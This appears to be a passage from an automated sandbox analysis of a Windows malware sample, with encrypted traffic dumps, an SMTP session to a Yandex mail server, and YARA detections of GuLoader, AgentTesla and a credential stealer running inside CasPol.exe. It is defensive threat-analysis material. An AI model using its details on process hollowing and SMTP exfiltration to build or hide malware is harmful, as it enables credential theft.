15 70 18 8a 54 2d 62 e0 c3 ac cc 1e 36 c5 31 32 7b d8 a3 77 e2 96 70 c7 40 11 a7 cc 64
                                                          Data Ascii: 9w^\As]c*?v=5AR^5DJ'XhGU+'(VO/%F(#.x\L R0F_R~RN<YAMvF}zO"_2zQ_GAcZ1-dP#8&YR8X#\z*cjpT-b612{wp@d
                                                          2021-12-14 13:10:57 UTC219INData Raw: f0 ed 10 f0 72 47 94 ee 66 2a a8 99 62 1c 26 61 4e 39 c0 1e f0 25 94 4c d4 64 d5 39 0f 6e d2 a3 fd 21 c5 19 58 24 17 5d 7c 0d c5 c4 13 0d ab 24 39 19 27 bd 57 9a fe 71 41 fb e1 f4 06 cc 4d 5c e2 e6 2e 45 90 ec 0e 7f 47 36 fc 81 63 fc 75 18 cc 7a 59 de e6 7b 0d e6 de 29 8b f4 68 67 89 3c f2 06 41 25 b8 47 12 cf dd 0a ea a2 b9 7c 68 de 97 46 01 45 e0 4f e9 9e 5c 97 47 58 ee e8 0c 9e e7 74 51 a4 14 ac 8d b0 f6 20 de 59 ca 3b 09 ff f7 c7 5f c0 91 9e 1c b9 00 a5 02 63 97 ba 14 0b b7 fd 26 a8 99 9c 0e 39 e3 31 e4 b5 cc 45 a6 d1 87 2b 2b 88 b4 d9 f6 8b 66 c6 85 df 3a f6 90 bc 3d df e6 06 aa 44 1f 9f bf ed 3a b1 ca 96 7c 4b 8d 21 34 60 d2 de ae 95 44 f9 ae cb 2b 16 40 22 7d 16 95 b6 97 00 ef 7d 15 68 35 e7 3d 21 de b5 35 bc 60 e4 c3 07 b6 32 d3 0f 0c 32 b5 6c 2f
                                                          Data Ascii: rGf*b&aN9%Ld9n!X$]|$9'WqAM\.EG6cuzY{)hg<A%G|hFEO\GXtQ Y;_c&91E++f:=D:|K!4`D+@"}}h5=!5`22l/
                                                          2021-12-14 13:10:57 UTC221INData Raw: f9 33 5d 2d 5d 32 52 bd 1c 84 60 79 7b 8c 3b 9e c0 00 ee e0 64 19 96 b4 c4 60 c1 e9 ef 69 79 e1 69 20 09 84 d8 50 9c bb 47 fa f1 f4 6c 38 cb 77 fe 94 e7 b2 f7 ae 95 f5 21 63 29 08 9d ba 87 b4 1b 50 80 78 83 9f 9b d1 18 ef 5e 3f b1 e0 ec 38 23 37 c3 1c 93 55 86 ef ed 82 f7 31 4a f4 a7 7a 22 87 a5 f8 02 69 d1 c9 da 81 1a 49 a4 73 cd cf a2 e4 3c aa f3 94 a4 d3 28 7c f6 61 c0 38 11 f8 71 87 99 ae e8 0b 96 64 61 e1 1f 4e 0d 98 22 35 51 0d 10 a3 94 f3 11 41 b4 3b f2 5e ea ea ab 36 b4 e3 89 92 ba 8f 10 6e 78 b6 a0 21 5e 07 26 f8 ad 79 99 af b5 2f fa 70 3b aa 89 70 0f 0e fc a4 6d ae 53 c9 d7 22 65 77 4a 30 6f 15 43 25 5d 87 5c c2 b9 ff c9 ac ed 37 26 d0 0d 3c 49 44 b7 e7 85 6c 99 46 9f 99 f6 eb 91 ad 28 86 32 06 b7 79 13 72 a6 35 81 97 20 2d fc 9c 87 41 ab c2 2b
                                                          Data Ascii: 3]-]2R`y{;d`iyi PGl8w!c)Px^?8#7U1Jz"iIs<(|a8qdaN"5QA;^6nx!^&y/p;pmS"ewJ0oC%]\7&<IDlF(2yr5 -A+


                                                          SMTP Packets

                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                          Dec 14, 2021 14:12:33.244256020 CET5874980377.88.21.158192.168.11.20220 myt6-ad03e4543bb0.qloud-c.yandex.net ESMTP (Want to use Yandex.Mail for your domain? Visit http://pdd.yandex.ru) 1639487553-pG6Bg139lQ-CWQaZpDX
                                                          Dec 14, 2021 14:12:33.244806051 CET49803587192.168.11.2077.88.21.158EHLO 035347
                                                          Dec 14, 2021 14:12:33.291738033 CET5874980377.88.21.158192.168.11.20250-myt6-ad03e4543bb0.qloud-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 42991616
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Dec 14, 2021 14:12:33.292074919 CET49803587192.168.11.2077.88.21.158STARTTLS
                                                          Dec 14, 2021 14:12:33.339095116 CET5874980377.88.21.158192.168.11.20220 Go ahead

                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:14:09:45
                                                          Start date:14/12/2021
                                                          Path:C:\Users\user\Desktop\pago12_14299038859.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\pago12_14299038859.exe"
                                                          Imagebase:0x400000
                                                          File size:167936 bytes
                                                          MD5 hash:9A1518ED709F916360E56B5AC7D76995
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Visual Basic
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.12762384265.0000000002AF0000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Start time:14:10:35
                                                          Start date:14/12/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\pago12_14299038859.exe"
                                                          Imagebase:0x7ff7749c0000
                                                          File size:108664 bytes
                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000000.12525032302.0000000001300000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:moderate

                                                          General

                                                          Start time:14:10:35
                                                          Start date:14/12/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff629610000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >